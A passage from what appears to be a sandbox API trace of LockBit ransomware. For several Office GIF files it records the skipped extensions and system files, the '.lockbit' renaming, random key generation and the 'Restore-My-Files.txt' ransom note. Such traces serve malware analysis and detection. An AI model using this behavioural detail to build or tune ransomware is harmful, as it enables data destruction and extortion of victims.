lpString2=".GIF") returned 1 [0210.043] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.043] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.043] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.044] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.044] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.044] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.044] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.044] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.044] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.044] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.044] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.044] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.044] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.044] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.044] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.044] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.044] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.044] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.044] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.044] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.045] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.045] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.045] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.045] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.045] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.045] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.045] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.046] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.046] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.046] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.046] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.046] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.046] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.046] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.046] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.047] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.047] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.047] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.047] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.047] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21348_.GIF") returned 1 [0210.047] lstrcmpiW (lpString1="ntldr", lpString2="BD21348_.GIF") returned 1 [0210.047] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21348_.GIF") returned 1 [0210.047] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21348_.GIF") returned 1 [0210.047] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21348_.GIF") returned -1 [0210.047] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21348_.GIF") returned 1 [0210.047] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21348_.GIF") returned 1 [0210.047] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.047] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21348_.GIF") returned=".GIF" [0210.047] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.047] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.047] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.047] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.047] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.047] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.047] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.047] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.047] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.047] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.047] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.047] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.047] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.048] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.048] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.048] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.048] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.048] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.048] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.048] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.048] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.048] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.048] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.048] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.048] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.048] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.048] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.048] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.048] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21348_.GIF.lockbit") returned 76 [0210.048] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21348_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21348_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0210.049] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.049] malloc (_Size=0x40068) returned 0x3f70048 [0210.050] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=1131) returned 1 [0210.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.050] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0210.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0210.051] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0210.059] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21348_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21348_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.059] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.059] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.069] free (_Block=0x1fa2ed8) [0210.069] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21348_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.069] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.069] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.069] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5462cc00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbce3b060, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5462cc00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x8e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21370_.GIF", cAlternateFileName="")) returned 1 [0210.069] lstrcmpiW (lpString1=".", lpString2="BD21370_.GIF") returned -1 [0210.069] lstrcmpiW (lpString1="..", lpString2="BD21370_.GIF") returned -1 [0210.069] PathFindExtensionW (pszPath="BD21370_.GIF") returned=".GIF" [0210.069] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.069] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.069] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.069] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.069] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.070] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.070] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.070] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.070] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.070] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.070] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.070] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.070] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.070] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.070] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.070] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.070] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.070] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.070] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.070] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.070] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.070] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.070] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.071] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.071] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.071] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.071] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.071] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.071] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.071] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.071] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.071] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.071] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.071] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.071] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.071] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.071] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.071] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.071] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.071] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.071] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.072] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.072] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.072] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.072] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.072] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.072] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.072] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21370_.GIF") returned 1 [0210.072] lstrcmpiW (lpString1="ntldr", lpString2="BD21370_.GIF") returned 1 [0210.072] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21370_.GIF") returned 1 [0210.072] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21370_.GIF") returned 1 [0210.072] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21370_.GIF") returned -1 [0210.072] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21370_.GIF") returned 1 [0210.072] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21370_.GIF") returned 1 [0210.072] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.072] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21370_.GIF") returned=".GIF" [0210.072] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.073] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.073] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.073] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.073] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.073] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.073] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.073] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.073] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.073] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.073] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.073] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.073] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.073] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.073] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.073] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.073] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.073] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.074] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.074] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.074] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.074] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.074] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.074] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.074] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.074] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.074] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.074] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.074] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21370_.GIF.lockbit") returned 76 [0210.074] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21370_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21370_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0210.076] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.076] malloc (_Size=0x40068) returned 0x3fb00b8 [0210.077] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3fb00d0 | out: lpFileSize=0x3fb00d0*=2275) returned 1 [0210.077] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.077] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00ec) returned 0x0 [0210.078] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.078] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00fc) returned 0x0 [0210.078] ReadFile (in: hFile=0x308, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 1 [0210.086] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21370_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21370_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.086] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.086] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.088] free (_Block=0x1fa2ed8) [0210.088] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21370_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.088] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.088] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.088] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d9b3c00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbce611c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x8d9b3c00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21390_.GIF", cAlternateFileName="")) returned 1 [0210.088] lstrcmpiW (lpString1=".", lpString2="BD21390_.GIF") returned -1 [0210.088] lstrcmpiW (lpString1="..", lpString2="BD21390_.GIF") returned -1 [0210.089] PathFindExtensionW (pszPath="BD21390_.GIF") returned=".GIF" [0210.089] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.089] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.089] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.089] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.089] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.089] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.089] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.089] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.089] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.089] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.089] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.089] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.089] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.089] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.089] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.089] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.089] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.089] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.089] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.089] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.089] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.090] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.090] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.090] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.090] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.090] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.090] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.091] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.091] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.091] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.091] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21390_.GIF") returned 1 [0210.091] lstrcmpiW (lpString1="ntldr", lpString2="BD21390_.GIF") returned 1 [0210.091] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21390_.GIF") returned 1 [0210.091] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21390_.GIF") returned 1 [0210.091] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21390_.GIF") returned -1 [0210.091] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21390_.GIF") returned 1 [0210.091] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21390_.GIF") returned 1 [0210.091] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.091] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21390_.GIF") returned=".GIF" [0210.091] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.091] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.091] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.091] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.091] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.091] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.091] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.091] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.092] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.092] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.092] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.092] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.092] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.092] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.092] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.092] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.092] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.092] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.092] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.092] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.092] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.092] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.092] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.092] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.092] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.092] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.092] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.092] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.092] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21390_.GIF.lockbit") returned 76 [0210.093] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21390_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21390_.gif"), 